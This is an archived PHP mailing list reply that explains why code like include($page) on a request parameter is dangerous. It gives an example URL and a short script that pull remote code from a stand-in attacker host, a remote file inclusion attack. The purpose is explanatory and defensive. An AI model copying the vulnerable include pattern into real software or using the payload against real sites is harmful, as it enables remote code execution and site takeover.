Daniel Brown wrote: > On Thu, Oct 2, 2008 at 12:57 PM, Jim Lucas <lists@xxxxxxxxx> wrote: >> so long, farewell, bye bye.... > > If you say so. Do you realize how many websites are going to > break now? ;-P > > https://www.example.com/secure/shop.php?page=creditcardinfo.php > <?php > include($page); > ?> > But, you must admit that your example above shows a very good reason that it SHOULD break! Example... https://www.example.com/secure/shop.php?page=http://www.myhackersite.com/hackerscript.txt <?php include($page); ?> hackerscript.txt <?php include 'http://www.myhackersite.com/filemanager.txt'; echo 'If you are including this, just think of everything else I can get to.'; $ob = new filemanager(); $ob->run(); ?> -- Jim Lucas "Some men are born to greatness, some achieve greatness, and some have greatness thrust upon them." Twelfth Night, Act II, Scene V by William Shakespeare -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
